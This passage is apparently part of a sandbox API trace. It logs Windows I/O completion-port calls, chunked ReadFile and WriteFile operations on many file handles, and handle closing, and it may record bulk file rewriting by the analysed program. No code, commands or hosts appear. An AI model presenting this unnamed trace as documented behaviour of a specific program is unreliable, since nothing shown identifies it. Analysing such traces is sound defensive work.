GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.408] WriteFile (in: hFile=0x1a4, lpBuffer=0x3480124*, nNumberOfBytesToWrite=0x1510d, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020 | out: lpBuffer=0x3480124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3480020) returned 1 [0160.428] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.428] WriteFile (in: hFile=0x1f0, lpBuffer=0x3900124*, nNumberOfBytesToWrite=0x5958, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020 | out: lpBuffer=0x3900124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3900020) returned 1 [0160.434] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.434] WriteFile (in: hFile=0x1ec, lpBuffer=0x3c60124*, nNumberOfBytesToWrite=0x159e0, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c60020 | out: lpBuffer=0x3c60124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c60020) returned 1 [0160.459] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.460] WriteFile (in: hFile=0x19c, lpBuffer=0x36c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020 | out: lpBuffer=0x36c0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x36c0020) returned 1 [0160.464] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0160.475] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b40020) returned 1 [0160.475] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0160.475] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3c60020) returned 1 [0160.475] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.476] CloseHandle (hObject=0x19c) returned 1 [0160.513] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x36c0020) returned 1 [0160.516] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.516] CloseHandle (hObject=0x1f0) returned 1 [0160.533] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3900020) returned 1 [0160.536] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.536] ReadFile (in: hFile=0x1e4, lpBuffer=0x3d80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x320f8f0, lpOverlapped=0x3d80020 | out: lpBuffer=0x3d80124, lpNumberOfBytesRead=0x320f8f0*=0x0, lpOverlapped=0x3d80020) returned 0x0 [0160.536] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0160.536] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3d80020) returned 1 [0160.536] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.536] WriteFile (in: hFile=0x1e4, lpBuffer=0x3d80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3d80020 | out: lpBuffer=0x3d80094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3d80020) returned 1 [0160.547] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0160.547] CloseHandle (hObject=0x1ec) returned 1 [0160.564] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3c60020) returned 1 [0160.566] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.050] CloseHandle (hObject=0x1b8) returned 1 [0168.076] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3a70020) returned 1 [0168.079] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.657] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0124, nNumberOfBytesToWrite=0x41cc, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0124, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x38c0020) returned 0x0 [0168.664] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.664] WriteFile (in: hFile=0x1dc, lpBuffer=0x3c20124*, nNumberOfBytesToWrite=0x85ba, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20124*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c20020) returned 1 [0168.686] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.686] WriteFile (in: hFile=0x1e0, lpBuffer=0x3f80124, nNumberOfBytesToWrite=0x15b6f, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3f80020 | out: lpBuffer=0x3f80124, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3f80020) returned 0x0 [0168.703] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.704] WriteFile (in: hFile=0x1a0, lpBuffer=0x38c0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x38c0020 | out: lpBuffer=0x38c0094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x38c0020) returned 1 [0168.709] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.709] WriteFile (in: hFile=0x1dc, lpBuffer=0x3c20094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c20020 | out: lpBuffer=0x3c20094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3c20020) returned 1 [0168.739] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0168.745] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3f80020) returned 1 [0168.745] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 0 [0168.745] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x40a0020) returned 1 [0168.745] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.745] CloseHandle (hObject=0x1d0) returned 1 [0168.776] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x39e0020) returned 1 [0168.779] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.779] WriteFile (in: hFile=0x1b4, lpBuffer=0x3e60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3e60020 | out: lpBuffer=0x3e60094*, lpNumberOfBytesWritten=0x320f8f0, lpOverlapped=0x3e60020) returned 1 [0168.800] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 [0168.808] CloseHandle (hObject=0x1b4) returned 1 [0168.843] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3e60020) returned 1 [0168.846] GetQueuedCompletionStatus (in: CompletionPort=0x130, lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x320f8f0, lpCompletionKey=0x320f8ec, lpOverlapped=0x320f8f4) returned 1 Thread: id = 122 os_tid = 0xbe0 [0148.851] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.156] ReadFile (in: hFile=0x198, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0149.199] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.201] WriteFile (in: hFile=0x198, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0149.203] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.203] ReadFile (in: hFile=0x198, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0149.209] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.212] WriteFile (in: hFile=0x198, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0149.214] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.214] WriteFile (in: hFile=0x198, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0149.215] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0149.215] CloseHandle (hObject=0x198) returned 1 [0149.374] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0149.375] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.521] ReadFile (in: hFile=0x1a8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x49a, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.521] ReadFile (in: hFile=0x1a8, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.521] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.521] WriteFile (in: hFile=0x1a8, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.521] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.521] CloseHandle (hObject=0x1a8) returned 1 [0155.522] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0155.523] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.608] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0155.630] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.630] WriteFile (in: hFile=0x19c, lpBuffer=0x710124*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.681] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.681] ReadFile (in: hFile=0x19c, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 0x0 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.681] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70124*, nNumberOfBytesToWrite=0x496, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.681] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.681] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 0x0 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.681] WriteFile (in: hFile=0x19c, lpBuffer=0x710094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x710020) returned 1 [0155.681] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 0 [0155.681] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0155.682] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.682] CloseHandle (hObject=0x19c) returned 1 [0155.689] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x710020) returned 1 [0155.690] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.690] WriteFile (in: hFile=0x1b8, lpBuffer=0x2b70094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70094*, lpNumberOfBytesWritten=0x347f798, lpOverlapped=0x2b70020) returned 1 [0155.690] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.690] CloseHandle (hObject=0x1b8) returned 1 [0155.691] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x2b70020) returned 1 [0155.694] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.761] ReadFile (in: hFile=0x1cc, lpBuffer=0x710124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x710020 | out: lpBuffer=0x710124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x710020) returned 1 [0155.931] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.931] ReadFile (in: hFile=0x1b8, lpBuffer=0x2b70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x2b70020 | out: lpBuffer=0x2b70124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x2b70020) returned 1 [0155.931] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.931] ReadFile (in: hFile=0x1c0, lpBuffer=0x3510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3510020 | out: lpBuffer=0x3510124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3510020) returned 1 [0155.954] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c) returned 1 [0155.954] ReadFile (in: hFile=0x1d0, lpBuffer=0x3630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x347f798, lpOverlapped=0x3630020 | out: lpBuffer=0x3630124*, lpNumberOfBytesRead=0x347f798*=0x0, lpOverlapped=0x3630020) returned 1 [0155.954] GetQueuedCompletionStatus (in: CompletionPort=0xd8, lpNumberOfBytesTransferred=0x347f798, lpCompletionKey=0x347f794, lpOverlapped=0x347f79c, dwMilliseconds=0xffffffff | out: 